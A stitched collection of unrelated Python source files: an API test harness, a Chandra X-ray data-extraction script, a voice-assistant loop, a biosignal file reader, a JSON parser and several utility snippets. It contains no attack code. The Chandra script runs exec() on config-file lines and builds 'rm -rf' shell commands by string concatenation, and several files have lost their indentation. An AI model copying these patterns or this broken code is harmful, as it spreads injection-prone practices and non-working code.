jroot['json_string'] = 'valueType=std::string'
postData = json.dumps(jroot)
print("test for set_webfilter_config")
print(postData)
response = urllib.request.urlopen(url, postData.encode('utf-8'))
recvData = response.read().decode('utf-8')
json.loads(recvData)
print(recvData)
def set_webfilter_power_test(self):
url = self.url + 'DataTransferSetWebfilterPower'
jroot = {}
path = list()
path.append('valueType=std::string')
path.append('valueType=std::string')
jroot['path'] = path
conf_power = list()
conf_power.append('valueType=unsigned int')
conf_power.append('valueType=unsigned int')
jroot['conf_power'] = conf_power
postData = json.dumps(jroot)
print("test for set_webfilter_power")
print(postData)
response = urllib.request.urlopen(url, postData.encode('utf-8'))
recvData = response.read().decode('utf-8')
json.loads(recvData)
print(recvData)
if __name__ == "__main__":
    obj = DataTransferTestCase("http://192.168.29.11:9090/")
    # methods that address a specific configuration node take a URL path
    # suffix; an empty suffix is passed here as a placeholder
    obj.set_message_push_config_test()
    obj.set_webfilter_contents_test('')
    obj.get_message_push_config_test()
    obj.set_user_pay_function_test()
    obj.get_webfilter_config_test('')
    obj.get_conf_file_md5_test()
    obj.set_webfilter_text_test('')
    obj.notify_web_filter_conf_change_test()
    obj.query_user_pay_function_test()
    obj.set_webfilter_attr_test('')
    obj.import_conf_test()
    obj.restore_default_config_test()
    obj.export_conf_test()
    obj.add_webfilter_text_test('')
    obj.get_webfilter_power_test()
    obj.del_webfilter_config_by_xpath_test('')
    obj.fast_small_data_transfer_write_test()
    obj.set_webfilter_config_test('')
    obj.set_webfilter_power_test()
|
# website for wordcloud: http://www.wordclouds.com/
import math
with open('website_WF.txt', 'r') as rf:
    with open('website_WF_Optimized_Text.txt', 'w') as wf:
        for line in rf:
            # each input line is "<frequency>\t<word>"
            line = line.replace('\n', '')
            line = line.split('\t')
            # compress the raw frequency onto a log base-1.2 scale so very
            # common words do not dominate the cloud
            line[0] = int(math.log(int(line[0]), 1.2))
            if line[0] >= 5:
                wf.write(str(line[0] * 2) + '\t' + line[1] + '\n')
|
class NhpcDBException(Exception):
def __str__(self):
return self._msg
class NhpcDBInvalidProperty(NhpcDBException):
def __init__(self, props, data_type):
self._msg = "'%s' properties invalid, should be %s" % (" ".join(props), data_type)
class NhpcDBInvalidAttribute(NhpcDBException):
def __init__(self, classname, attrname):
self._msg = "'%s' attribute not implemented in '%s'" % (attrname, classname)
class NhpcDBFieldNotImplemented(NhpcDBException):
def __init__(self, classname):
self._msg = "'%s' field not implemented" % classname
class NhpcDBFieldRequired(NhpcDBException):
def __init__(self, classname, attrname):
self._msg = "'%s' field required for '%s'" % (classname, attrname)
class NhpcDBInvalidValue(NhpcDBException):
def __init__(self, classname, req_classname):
self._msg = "'%s' should be '%s'" % (classname, req_classname)
|
#!/usr/bin/env /data/mta/Script/Python3.6/envs/ska3/bin/python
#####################################################################################
# #
# get_data_for_month.py: get a month amount of data and update data files #
# #
# author: t. isobe (tisobe@cfa.harvard.edu) #
# #
# Last Update: Apr 18, 2019 #
# #
#####################################################################################
import os
import os.path
import sys
import re
import string
import random
import operator
import math
import numpy
import astropy.io.fits as pyfits
import time
import unittest
#
#--- from ska
#
from Ska.Shell import getenv, bash
ascdsenv = getenv('source /home/ascds/.ascrc -r release', shell='tcsh')
#
#--- reading directory list
#
path = '/data/mta/Script/ACIS/Count_rate/house_keeping/dir_list_py'
f= open(path, 'r')
data = [line.strip() for line in f.readlines()]
f.close()
for ent in data:
atemp = re.split(':', ent)
var = atemp[1].strip()
line = atemp[0].strip()
exec("%s = %s" %(var, line))
#
#--- append paths to private folders to the python path
#
sys.path.append(bin_dir)
sys.path.append(mta_dir)
#
#--- import several functions
#
import mta_common_functions as mcf
#
#--- temp writing file name
#
rtail = int(time.time() * random.random())
zspace = '/tmp/zspace' + str(rtail)
#-------------------------------------------------------------------------------
#--- get_data_for_month: extract one month amount of data and update data files
#-------------------------------------------------------------------------------
def get_data_for_month(year, month):
"""
extract one month amount of data and update data files
input: year --- year of the data
month --- month of the data
output: updated data files:
<MMM><YYYY>/ccd#
<MMM><YYYY>/ephin_data
Note: there is no ephin data after 2018 Nov
"""
#
#--- if the year/month are not given, extract data of the last month
#
if year == '':
        out = time.strftime('%Y:%m', time.gmtime())
atemp = re.split(':', out)
year = int(float(atemp[0]))
month = int(float(atemp[1]))
month -= 1
if month < 1:
month = 12
year -= 1
cmonth = mcf.change_month_format(month) #--- convert digit to letter month
ucmon = cmonth.upper()
dir_name = data_dir + '/' + ucmon + str(year) + '/' #--- output directory
if os.path.isdir(dir_name):
cmd = 'rm -rf ' + dir_name + '*'
else:
cmd = 'mkdir -p ' + dir_name
os.system(cmd)
#
#--- get acis count rate data
#
extract_acis_count_rate(year, month, dir_name)
#
#--- get ephin rate data; no data after Nov 2018
#
if year < 2018:
get_ephin_data(year, month, dir_name)
elif (year == 2018) and (month < 11):
get_ephin_data(year, month, dir_name)
#
#-- clean the data files
#
cleanUp(dir_name)
#------------------------------------------------------------------------------
#-- extract_acis_count_rate: extract acis count rate data --
#-------------------------------------------------------------------------------
def extract_acis_count_rate(year, month, dir_name):
"""
extract acis count rate data
input: year --- year
month --- month
dir_name --- output dir name
output: <dir_name>/ccd<#ccd>
"""
#
#--- make a list of data fits file
#
data_list = get_data_list_from_archive(year, month)
for ifile in data_list:
#
#--- extract the fits file with arc5gl
#
line = 'operation=retrieve\n'
line = line + 'dataset=flight\n'
line = line + 'detector=acis\n'
line = line + 'level=1\n'
line = line + 'filetype=evt1\n'
line = line + 'filename=' + ifile + '\n'
line = line + 'go\n'
run_arc5gl(line)
cmd = 'gzip -d ' + ifile + '.gz'
os.system(cmd)
#
#--- extract data and update/create the count rate data
#
extract_data(ifile, dir_name)
mcf.rm_files(ifile)
#-------------------------------------------------------------------------------
#-- get_data_list_from_archive: make a list of non-calibration acis evt1 files for the month
#-------------------------------------------------------------------------------
def get_data_list_from_archive(year, month):
"""
    create a list of non-calibration acis evt1 files for the given month
    input:  year    --- year of the data set
            month   --- month of the data set
    output: file_list   --- a list of acis evt1 file names
"""
#
#--- set start and stop time of data extraction period (one month)
#
[start, stop] = set_start_stop_time(year, month)
#
#--- create data list with arc5gl
#
line = 'operation=browse\n'
line = line + 'dataset=flight\n'
line = line + 'detector=acis\n'
line = line + 'level=1\n'
line = line + 'filetype=evt1\n'
line = line + 'tstart=' + str(start) + '\n'
line = line + 'tstop=' + str(stop) + '\n'
line = line + 'go\n'
run_arc5gl(line, out='zlist')
data = mcf.read_data_file('zlist', remove=1)
#
#--- choose files with only non-calibration data
#
file_list = []
for ent in data:
mc = re.search('acisf', ent)
if mc is None:
continue
ftemp = re.split('\s+', ent)
atemp = re.split('acisf', ftemp[0])
btemp = re.split('_', atemp[1])
ctemp = re.split('N', btemp[0])
mark = int(ctemp[0])
if mark < 50000:
file_list.append(ftemp[0])
return file_list
#---------------------------------------------------------------------------------
#--- extract_data: extract time and ccd_id from the fits file and create count rate data
#---------------------------------------------------------------------------------
def extract_data(ifile, out_dir):
"""
extract time and ccd_id from the fits file and create count rate data
input: file --- fits file data
out_dir --- the directory in which data will be saved
output: ccd<ccd>--- 5 min accumulated count rate data file
"""
#
#--- extract time and ccd id information from the given file
#
data = pyfits.getdata(ifile, 0)
time_col = data.field('TIME')
ccdid_col = data.field('CCD_ID')
#
#--- initialize
#
diff = 0
chk = 0
ccd_c = [0 for x in range(0, 10)]
ccd_h = [[] for x in range(0, 10)]
ftime = -999
#
#--- check each line and count the number of hits on each ccd in each 300 sec interval
#
for k in range(0, len(time_col)):
try:
stime = float(time_col[k])
if stime <= 0:
continue
ccd_id = int(float(ccdid_col[k]))
except:
continue
if ftime < 0:
ftime = stime
diff = 0
else:
diff = stime - ftime
if diff >= 300.0:
#
#--- save counts after accumulating for 300 sec
#
for i in range(0, 10):
line = str(ftime) + '\t' + str(ccd_c[i]) + '\n'
ccd_h[i].append(line)
#
#--- reinitialize for the next round
#
ccd_c[i] = 0
ccd_c[ccd_id] += 1
ftime = stime
diff = 0
#
#--- accumulate the count until the 300 sec interval is reached
#
else:
ccd_c[ccd_id] += 1
#
#--- for the case the last interval is less than 300 sec,
#--- estimate the number of hits and adjust
#
if diff > 0 and diff < 300:
ratio = 300.0 / diff
for i in range(0, 10):
ccd_c[i] *= ratio
ccd_c[i] = int(ccd_c[i])
line = str(stime) + '\t' + str(ccd_c[i]) + '\n'
ccd_h[i].append(line)
#
#--- print out the results
#
for i in range(0, 10):
ofile = out_dir + '/ccd' + str(i)
with open(ofile, 'a') as fo:
for ent in ccd_h[i]:
fo.write(ent)
#-------------------------------------------------------------------------------
#-- get_ephin_data: extract ephin data and create ephin_data file --
#-------------------------------------------------------------------------------
def get_ephin_data(year, mon, out_dir):
"""
extract ephin data and create ephin_data file
input: year --- year
mon --- month
out_dir --- output directory
    output: out_dir/ephin_data
"""
#
#--- set data extraction time period (one month)
#
    [start, stop] = set_start_stop_time(year, mon)
#
#--- first create a list of ephin fits file for the month
#
line = 'operation=browse\n'
line = line + 'dataset=flight\n'
line = line + 'detector=ephin\n'
line = line + 'level=1\n'
line = line + 'filetype=ephrates\n'
line = line + 'tstart=' + start + '\n'
line = line + 'tstop=' + stop + '\n'
line = line + 'go\n'
run_arc5gl(line, out='./elist')
data = mcf.read_data_file('./elist', remove=1)
#
#--- extract ephin fits file one by one and analyze
#
for ent in data:
mc = re.search('fits', ent)
if mc is not None:
atemp = re.split('\s+', ent)
fits = atemp[0]
line = 'operation=retrieve\n'
line = line + 'dataset=flight\n'
line = line + 'detector=ephin\n'
line = line + 'level=1\n'
line = line + 'filetype=ephrates\n'
line = line + 'filename=' + fits + '\n'
line = line + 'go\n'
run_arc5gl(line)
cmd = 'gzip -d *fits.gz'
os.system(cmd)
extract_ephin_data(fits, out_dir)
#-------------------------------------------------------------------------------
#-- extract_ephin_data: extract ephine data from a given data file name and save it in out_dir --
#-------------------------------------------------------------------------------
def extract_ephin_data(ifile, out_dir):
"""
extract ephine data from a given data file name and save it in out_dir
input: ifile --- ephin data file name
out_dir --- directory which the data is saved
output: <out_dir>/ephin_data --- ephin data (300 sec accumulation)
"""
#
#--- extract time and ccd id information from the given file
#
data = pyfits.getdata(ifile, 1)
time_r = data.field("TIME")
scp4_r = data.field("SCP4")
sce150_r = data.field("SCE150")
sce300_r = data.field("SCE300")
    sce1300_r = data.field("SCE1300")
#
#--- initialize
#
ephin_data = []
#
#--- sdata[0]: scp4, sdata[1]: sce150, sdata[2]: sce300, and sdata[3]: sce1300
#
sdata = [0 for x in range(0,4)]
ftime = -999
#
#--- check each line and accumulate the rates in each 300 sec interval
#
for k in range(0, len(time_r)):
try:
stime = float(time_r[k])
if stime <= 0:
continue
sd0 = float(scp4_r[k])
sd1 = float(sce150_r[k])
sd2 = float(sce300_r[k])
            sd3 = float(sce1300_r[k])
except:
continue
if ftime < 0:
ftime = stime
diff = 0
else:
diff = stime - ftime
if diff >= 300.0:
#
#--- save counts per 300 sec
#
line = str(ftime)
for j in range(0, 4):
line = line + '\t%4.4f' % (round(sdata[j],4))
line = line + '\n'
ephin_data.append(line)
#
#--- re-initialize for the next round
#
sdata[0] = sd0
sdata[1] = sd1
sdata[2] = sd2
sdata[3] = sd3
ftime = stime
#
#--- accumulate the count until the 300 sec interval is reached
#
else:
sdata[0] += sd0
sdata[1] += sd1
sdata[2] += sd2
sdata[3] += sd3
diff = stime - ftime
#
#--- for the case the last interval is less than 300 sec,
#--- estimate the number of hits and adjust
#
if (diff > 0) and (diff < 300):
line = str(ftime)
ratio = 300.0 / diff
for j in range(0, 4):
var = sdata[j] * ratio
line = line + '\t%4.4f' % (round(var,4))
line = line + '\n'
ephin_data.append(line)
#
#--- print out the data
#
ofile = out_dir + '/ephin_rate'
with open(ofile, 'a') as fo:
for ent in ephin_data:
fo.write(ent)
mcf.rm_files(ifile)
#-------------------------------------------------------------------------------
#-- cleanUp: sort and remove duplicated lines in all files in given data directory ---
#-------------------------------------------------------------------------------
def cleanUp(cdir):
"""
sort and remove duplicated lines in all files in given data directory
Input cdir --- directory name
Output cdir/files --- cleaned up files
"""
if os.path.isdir(cdir):
cmd = 'ls ' + cdir + '/* > ' + zspace
os.system(cmd)
flist = mcf.read_data_file(zspace, remove=1)
for ifile in flist:
data = mcf.read_data_file(ifile)
if len(data) < 2:
continue
data = sorted(data)
prev = data[0]
line = data[0] + '\n'
for comp in data[1:]:
if comp == prev:
continue
else:
line = line + comp + '\n'
prev = comp
with open(ifile, 'w') as fo:
fo.write(line)
#-------------------------------------------------------------------------------
#-- run_arc5gl: run arc5gl command --
#-------------------------------------------------------------------------------
def run_arc5gl(line, out=''):
"""
run arc5gl command
    input:  line    --- arc5gl command lines
out --- output file name; default: "" --- no output file
output: results of the command
"""
with open(zspace, 'w') as fo:
fo.write(line)
try:
cmd = '/proj/sot/ska/bin/arc5gl -user isobe -script ' + zspace
if out != '':
cmd = cmd + '> ' + out
os.system(cmd)
except:
try:
cmd = '/proj/axaf/simul/bin/arc5gl -user isobe -script ' + zspace
if out != '':
cmd = cmd + '> ' + out
os.system(cmd)
except:
cmd1 = "/usr/bin/env PERL5LIB= "
cmd2 = '/proj/axaf/simul/bin/arc5gl -user isobe -script ' + zspace
if out != '':
cmd2 = cmd2 + '> ' + out
cmd = cmd1 + cmd2
bash(cmd, env=ascdsenv)
mcf.rm_files(zspace)
#-------------------------------------------------------------------------------
#-- set_start_stop_time: create start and stop time in the format of arc5gl --
#-------------------------------------------------------------------------------
def set_start_stop_time(year, month):
"""
create start and stop time in the format of arc5gl
input: year --- year
month --- month
output: start --- in format of <yyyy>-<mm>-01T00:00:00
output: stop --- in format of <yyyy>-<mm>-01T00:00:00
"""
nyear = year
nmonth = month + 1
if nmonth > 12:
nmonth = 1
nyear += 1
smonth = str(month)
if month < 10:
smonth = '0' + smonth
snmonth = str(nmonth)
if nmonth < 10:
snmonth = '0' + snmonth
start = str(year) + '-' + smonth + '-01T00:00:00'
stop = str(nyear) + '-' + snmonth + '-01T00:00:00'
return [start, stop]
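#
#--- example (illustrative only): set_start_stop_time(2021, 12) returns
#--- ['2021-12-01T00:00:00', '2022-01-01T00:00:00']
#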
#------------------------------------------------------------
if __name__ == "__main__":
if len(sys.argv) == 1:
get_data_for_month('', '')
elif len(sys.argv) == 3:
year = int(sys.argv[1])
month = int(sys.argv[2])
get_data_for_month(year, month)
else:
print("get_data_for_month.py <year> <month>")
exit(1)
|
# -*- coding: utf-8 -*-
# Personal Assistant Reliable Intelligent System
# By Tanguy De Bels
from Brains.social import *
from Brains.utils import *
from Brains.net import *
from Brains.custom import *
import Utilities.vars
import Utilities.tools
import Senses
import os
import re
import pickle
from nltk.stem.snowball import FrenchStemmer
stemmer = FrenchStemmer()
#loading env from vars
with open(files(0), mode='rb') as f:
    trigger_ht = pickle.load(f)
with open(files(1), mode='rb') as f:
    composed_trigger_ht = pickle.load(f)
with open(files(2), mode='rb') as f:
    macro_paths_ht = pickle.load(f)
with open(files(3), mode='rb') as f:
    custom_interactions_ht = pickle.load(f)
#main loop
while vars.boucling == True:
msg = listen()
if msg is not None:
words = re.findall(r"[\w]+", msg, re.UNICODE)
last_index = 0
for idx in range(len(words)):
w = stemmer.stem(words[idx])
if w in trigger_ht.keys():
for k in composed_trigger_ht.keys():
if k in u" ".join(w for w in words[last_index+1:idx]):
if composed_trigger_ht[k] == macro_exe:
macro_exe(macro_paths_ht, k)
elif composed_trigger_ht[k] == dial_exe:
dial_exe(custom_interactions_ht, k)
else:
composed_trigger_ht[k](msg)
last_index = idx
if trigger_ht[w] == macro_exe:
macro_exe(macro_paths_ht, w)
elif trigger_ht[w] == dial_exe:
dial_exe(custom_interactions_ht, w)
else:
trigger_ht[w](msg)
for k in composed_trigger_ht.keys():
if k in u" ".join(w for w in words[last_index+1:]):
if composed_trigger_ht[k] == macro_exe:
macro_exe(macro_paths_ht, k)
elif composed_trigger_ht[k] == dial_exe:
dial_exe(custom_interactions_ht, k)
else:
composed_trigger_ht[k](msg)
|
"""
Module for reading ME6000 .tff format files.
http://www.biomation.com/kin/me6000.htm
"""
import datetime
import os
import struct
import numpy as np
def rdtff(file_name, cut_end=False):
"""
Read values from a tff file.
Parameters
----------
file_name : str
Name of the .tff file to read.
cut_end : bool, optional
If True, cuts out the last sample for all channels. This is for
reading files which appear to terminate with the incorrect
number of samples (ie. sample not present for all channels).
Returns
-------
signal : ndarray
A 2d numpy array storing the physical signals from the record.
fields : dict
A dictionary containing several key attributes of the read record.
markers : ndarray
A 1d numpy array storing the marker locations.
triggers : ndarray
A 1d numpy array storing the trigger locations.
Notes
-----
This function is slow because tff files may contain any number of
escape sequences interspersed with the signals. There is no way to
know the number of samples/escape sequences beforehand, so the file
is inefficiently parsed a small chunk at a time.
It is recommended that you convert your tff files to WFDB format.
"""
file_size = os.path.getsize(file_name)
with open(file_name, "rb") as fp:
fields, file_fields = _rdheader(fp)
signal, markers, triggers = _rdsignal(
fp,
file_size=file_size,
header_size=file_fields["header_size"],
n_sig=file_fields["n_sig"],
bit_width=file_fields["bit_width"],
is_signed=file_fields["is_signed"],
cut_end=cut_end,
)
return signal, fields, markers, triggers
def _rdheader(fp):
"""
    Read header info of the tff file.
Parameters
----------
fp : file IO object
The input header file to be read.
Returns
-------
fields : dict
For interpreting the waveforms.
file_fields : dict
For reading the signal samples.
"""
tag = None
# The '2' tag indicates the end of tags.
while tag != 2:
# For each header element, there is a tag indicating data type,
# followed by the data size, followed by the data itself. 0's
# pad the content to the nearest 4 bytes. If data_len=0, no pad.
tag = struct.unpack(">H", fp.read(2))[0]
data_size = struct.unpack(">H", fp.read(2))[0]
pad_len = (4 - (data_size % 4)) % 4
pos = fp.tell()
# Currently, most tags will be ignored...
# storage method
if tag == 1001:
storage_method = fs = struct.unpack("B", fp.read(1))[0]
storage_method = {0: "recording", 1: "manual", 2: "online"}[
storage_method
]
# fs, unit16
elif tag == 1003:
fs = struct.unpack(">H", fp.read(2))[0]
# sensor type
elif tag == 1007:
# Each byte contains information for one channel
n_sig = data_size
channel_data = struct.unpack(">%dB" % data_size, fp.read(data_size))
# The documentation states: "0 : Channel is not used"
# This means the samples are NOT saved.
channel_map = (
(1, 1, "emg"),
(15, 30, "goniometer"),
(31, 46, "accelerometer"),
(47, 62, "inclinometer"),
(63, 78, "polar_interface"),
(79, 94, "ecg"),
(95, 110, "torque"),
(111, 126, "gyrometer"),
(127, 142, "sensor"),
)
sig_name = []
# The number range that the data lies between gives the
# channel
for data in channel_data:
# Default case if byte value falls outside of channel map
base_name = "unknown"
# Unused channel
if data == 0:
n_sig -= 1
break
for item in channel_map:
if item[0] <= data <= item[1]:
base_name = item[2]
break
existing_count = [base_name in name for name in sig_name].count(
True
)
sig_name.append("%s_%d" % (base_name, existing_count))
# Display scale. Probably not useful.
elif tag == 1009:
# 100, 500, 1000, 2500, or 8500uV
display_scale = struct.unpack(">I", fp.read(4))[0]
# sample format, uint8
elif tag == 3:
sample_fmt = struct.unpack("B", fp.read(1))[0]
is_signed = bool(sample_fmt >> 7)
# ie. 8 or 16 bits
bit_width = sample_fmt & 127
# Measurement start time - seconds from 1.1.1970 UTC
elif tag == 101:
n_seconds = struct.unpack(">I", fp.read(4))[0]
base_datetime = datetime.datetime.utcfromtimestamp(n_seconds)
base_date = base_datetime.date()
base_time = base_datetime.time()
# Measurement start time - minutes from UTC
elif tag == 102:
n_minutes = struct.unpack(">h", fp.read(2))[0]
# Go to the next tag
fp.seek(pos + data_size + pad_len)
header_size = fp.tell()
# For interpreting the waveforms
fields = {
"fs": fs,
"n_sig": n_sig,
"sig_name": sig_name,
"base_time": base_time,
"base_date": base_date,
}
# For reading the signal samples
file_fields = {
"header_size": header_size,
"n_sig": n_sig,
"bit_width": bit_width,
"is_signed": is_signed,
}
return fields, file_fields
def _rdsignal(fp, file_size, header_size, n_sig, bit_width, is_signed, cut_end):
"""
Read the signal.
Parameters
----------
fp : file IO object
The input header file to be read.
file_size : int
Size of the file in bytes.
header_size : int
Size of the header file in bytes.
n_sig : int
The number of signals contained in the dat file.
bit_width : int
The number of bits necessary to represent the number in binary.
is_signed : bool
Whether the number is signed (True) or not (False).
cut_end : bool, optional
If True, enables reading the end of files which appear to terminate
with the incorrect number of samples (ie. sample not present for all channels),
by checking and skipping the reading the end of such files.
Checking this option makes reading slower.
Returns
-------
signal : ndarray
        Transformed expanded signal into uniform signal.
markers : ndarray
A 1d numpy array storing the marker locations.
triggers : ndarray
A 1d numpy array storing the trigger locations.
"""
# Cannot initially figure out signal length because there
# are escape sequences.
fp.seek(header_size)
signal_size = file_size - header_size
byte_width = int(bit_width / 8)
# numpy dtype
dtype = str(byte_width)
if is_signed:
dtype = "i" + dtype
else:
dtype = "u" + dtype
# big endian
dtype = ">" + dtype
# The maximum possible samples given the file size
# All channels must be present
max_samples = int(signal_size / byte_width)
max_samples = max_samples - max_samples % n_sig
# Output information
signal = np.empty(max_samples, dtype=dtype)
markers = []
triggers = []
# Number of (total) samples read
sample_num = 0
# Read one sample for all channels at a time
if cut_end:
stop_byte = file_size - n_sig * byte_width + 1
while fp.tell() < stop_byte:
chunk = fp.read(2)
sample_num = _get_sample(
fp, chunk, n_sig, dtype, signal, markers, triggers, sample_num
)
else:
while True:
chunk = fp.read(2)
if not chunk:
break
sample_num = _get_sample(
fp, chunk, n_sig, dtype, signal, markers, triggers, sample_num
)
# No more bytes to read. Reshape output arguments.
signal = signal[:sample_num]
signal = signal.reshape((-1, n_sig))
markers = np.array(markers, dtype="int")
triggers = np.array(triggers, dtype="int")
return signal, markers, triggers
def _get_sample(fp, chunk, n_sig, dtype, signal, markers, triggers, sample_num):
"""
Get the total number of samples in the signal.
Parameters
----------
fp : file IO object
The input header file to be read.
chunk : str
The data currently being processed.
n_sig : int
The number of signals contained in the dat file.
dtype : str
String numpy dtype used to store the signal of the given
resolution.
signal : ndarray
        Transformed expanded signal into uniform signal.
markers : ndarray
A 1d numpy array storing the marker locations.
triggers : ndarray
A 1d numpy array storing the trigger locations.
sample_num : int
The total number of samples in the signal.
Returns
-------
sample_num : int
The total number of samples in the signal.
"""
tag = struct.unpack(">h", chunk)[0]
# Escape sequence
if tag == -32768:
# Escape sequence structure: int16 marker, uint8 type,
# uint8 length, uint8 * length data, padding % 2
escape_type = struct.unpack("B", fp.read(1))[0]
data_len = struct.unpack("B", fp.read(1))[0]
# Marker*
if escape_type == 1:
            # *In manual mode, this could be block start/stop time.
            # But here we assume it is just a single time marker.
markers.append(sample_num / n_sig)
# Trigger
elif escape_type == 2:
triggers.append(sample_num / n_sig)
fp.seek(data_len + data_len % 2, 1)
# Regular samples
else:
fp.seek(-2, 1)
signal[sample_num : sample_num + n_sig] = np.fromfile(
fp, dtype=dtype, count=n_sig
)
sample_num += n_sig
return sample_num
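# A minimal usage sketch (not part of the original module); "example.tff" is a
# placeholder file name, not a real file.
def _rdtff_example():
    signal, fields, markers, triggers = rdtff("example.tff", cut_end=True)
    print(fields["fs"], signal.shape, markers.shape, triggers.shape)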
|
"""
Explorations for Sokoban.
Feel free to add new exploration code here.
"""
import pygame
from pygame.locals import *
import common as C
from utils import *
import queue
import heapq
from time import time
from math import sqrt
class DFS:
"""
Classical Depth-First Search walkthrough of the level to discover what is
the "interior" and "exterior.
"""
def __init__(self, level):
self.level = level
def search_floor(self, source):
init_x, init_y = source
# to remember which tiles have been visited or not
mark = [[False for x in range(self.level.width)]
for y in range(self.level.height)]
def rec_explore(position):
x, y = position
if mark[y][x]:
return
# mark current position as visited
mark[y][x] = True
for d, (mx, my) in enumerate(C.DIRS):
if self.level.is_wall((x+mx, y+my)):
continue
rec_explore((x+mx, y+my))
rec_explore(source)
return mark
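# A minimal usage sketch (hypothetical): assuming `level` exposes `width`,
# `height` and `is_wall()` as used above, and `start` is an (x, y) tuple on
# the floor, this counts the tiles reachable from `start`.
def count_reachable_tiles(level, start):
    mark = DFS(level).search_floor(start)
    return sum(row.count(True) for row in mark)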
|
import click
import requests
from requests.adapters import HTTPAdapter
from requests.packages.urllib3.util.retry import Retry
def error(*msg):
msg = " ".join([str(x) for x in msg])
click.echo(click.style(msg, fg="red"))
def warning(*msg):
msg = " ".join([str(x) for x in msg])
click.echo(click.style(msg, fg="yellow"))
def info(*msg):
msg = " ".join([str(x) for x in msg])
click.echo(click.style(msg))
def success(*msg):
msg = " ".join([str(x) for x in msg])
click.echo(click.style(msg, fg="green"))
def requests_retry_session(
retries=4, backoff_factor=0.4, status_forcelist=(500, 502, 504), session=None
):
"""Opinionated wrapper that creates a requests session with a
HTTPAdapter that sets up a Retry policy that includes connection
retries.
    If you do the more naive retry by simply setting a number, e.g.::
adapter = HTTPAdapter(max_retries=3)
then it will raise immediately on any connection errors.
Retrying on connection errors guards better on unpredictable networks.
From http://docs.python-requests.org/en/master/api/?highlight=retries#requests.adapters.HTTPAdapter
it says: "By default, Requests does not retry failed connections."
The backoff_factor is documented here:
https://urllib3.readthedocs.io/en/latest/reference/urllib3.util.html#urllib3.util.retry.Retry
A default of retries=3 and backoff_factor=0.3 means it will sleep like::
[0.3, 0.6, 1.2]
""" # noqa
session = session or requests.Session()
retry = Retry(
total=retries,
read=retries,
connect=retries,
backoff_factor=backoff_factor,
status_forcelist=status_forcelist,
)
adapter = HTTPAdapter(max_retries=retry)
session.mount("http://", adapter)
session.mount("https://", adapter)
return session
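def _retry_session_example():
    """A minimal sketch (the URL below is a placeholder, not part of this
    module) showing how the retrying session is typically used."""
    session = requests_retry_session(retries=3, backoff_factor=0.3)
    response = session.get("https://example.com/api/health", timeout=10)
    return response.status_code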
def _humanize_time(amount, units):
"""Chopped and changed from http://stackoverflow.com/a/6574789/205832"""
intervals = (1, 60, 60 * 60, 60 * 60 * 24, 604800, 2419200, 29030400)
names = (
("second", "seconds"),
("minute", "minutes"),
("hour", "hours"),
("day", "days"),
("week", "weeks"),
("month", "months"),
("year", "years"),
)
result = []
unit = [x[1] for x in names].index(units)
# Convert to seconds
amount = amount * intervals[unit]
for i in range(len(names) - 1, -1, -1):
a = int(amount) // intervals[i]
if a > 0:
result.append((a, names[i][1 % a]))
amount -= a * intervals[i]
return result
def humanize_seconds(seconds):
return "{} {}".format(*_humanize_time(seconds, "seconds")[0])
|
from __future__ import print_function
import json
import unittest
import sys
from peggy.peggy import PackratParser, Not, ZeroOrMore
# References : https://github.com/antlr/grammars-v4/blob/master/json/JSON.g4
# TODO Think and optimize spaces
class JsonParser(PackratParser):
def __init__(self, text):
rules = {
"parse": [
["_", "object", "_", Not(r".")],
["_", "array", "_", Not(r".")]
],
"object": [
[r"[{]", "_", "pair", "_",
ZeroOrMore("_", r"[,]", "_", "pair"), "_", r"[}]", "@dict_"],
[r"[{]", "_", r"[}]", "@empty_dict"]
],
"array": [
[r"[\[]", "_", "value", "_",
ZeroOrMore("_", r"[,]", "_", "value"), r"[\]]", "@list_"],
[r"[\[]", "_", r"[\]]", "@empty_list"]
],
"pair": [
["_", "string", "_", r"[:]", "_", "value", "_", "@hug"]
],
"value": [
["string"],
["number"],
["object"],
["array"],
[r"(true)", "@special"],
[r"(false)", "@special"],
[r"(null)", "@special"]
],
"string": [
[r'"((?:\\.|[^"\\])*)"', "@unescape"]
],
"number": [
[r"(\d+)", "@to_int"]
],
"_": [
[r"(?:\s|\r|\n)*"]
]
}
PackratParser.__init__(self, rules, text)
def parse(self):
return self.try_parse()
@staticmethod
def dict_(*args):
return dict(args),
@staticmethod
def empty_dict(*_):
return {},
@staticmethod
def list_(*args):
return list(args),
@staticmethod
def empty_list(*_):
return [],
@staticmethod
def unescape(string):
        if sys.version[0] == "2":
            return string.decode("string_escape"),
        else:
            # str has no .decode() in Python 3; round-trip through bytes first
            return string.encode("utf-8").decode("unicode_escape"),
@staticmethod
def special(value):
if value == "true":
return True,
elif value == "false":
return False,
elif value == "null":
return None,
assert False, "Invalid Special {val}".format(val=value)
class TestJsonParser(unittest.TestCase):
def test_json_basic(self):
objects = [
{"he\\l\"lo": "world", "hi": {"alternative": "reality"}},
{"null_checker": None, "hi": {"false": False, "true": True}},
[["A"], "2", [[[]], {}]],
{"Hello": None, "World": [[[1]]]}
]
for obj in objects:
s = json.dumps(obj)
parser = JsonParser(s)
parsed_object, = parser.parse()
print("Original::\n{obj}\nParsed::\n{parsed}\n\n".format(
obj=s, parsed=json.dumps(parsed_object)))
self.assertEqual(obj, parsed_object)
|
from __future__ import absolute_import, division, print_function
import numpy as np
import torch
from pyemd import emd
from collections import defaultdict
from transformers import *
def tokenize(text):
"""
Tokenizes a text and maps tokens to token-ids
"""
return tokenizer.convert_tokens_to_ids(tokenizer.tokenize(text))
def get_sentence_features(tokens, pad_seq_length: int):
"""
Convert tokenized sentence in its embedding ids, segment ids and mask
:param tokens:
a tokenized sentence
:param pad_seq_length:
the maximal length of the sequence. Cannot be greater than self.sentence_transformer_config.max_seq_length
:return: embedding ids, segment ids and mask for the sentence
"""
pad_seq_length = min(pad_seq_length, max_seq_length) + 2 #Add space for special tokens
return tokenizer.prepare_for_model(tokens, max_length=pad_seq_length, pad_to_max_length=True, return_tensors='pt')
def encode(features):
"""Returns token_embeddings, cls_token"""
#RoBERTa does not use token_type_ids
output_states = model(**features)
output_tokens = output_states[0]
cls_tokens = output_tokens[:, 0, :] # CLS token is first token
features.update({'token_embeddings': output_tokens, 'cls_token_embeddings': cls_tokens, 'attention_mask': features['attention_mask']})
if model.config.output_hidden_states:
hidden_states = output_states[2]
features.update({'all_layer_embeddings': hidden_states})
return features
def get_word_embedding_dimension() -> int:
return model.config.hidden_size
def padding(arr, pad_token, dtype=torch.long):
lens = torch.LongTensor([len(a) for a in arr])
max_len = lens.max().item()
padded = torch.ones(len(arr), max_len, dtype=dtype) * pad_token
mask = torch.zeros(len(arr), max_len, dtype=torch.long)
for i, a in enumerate(arr):
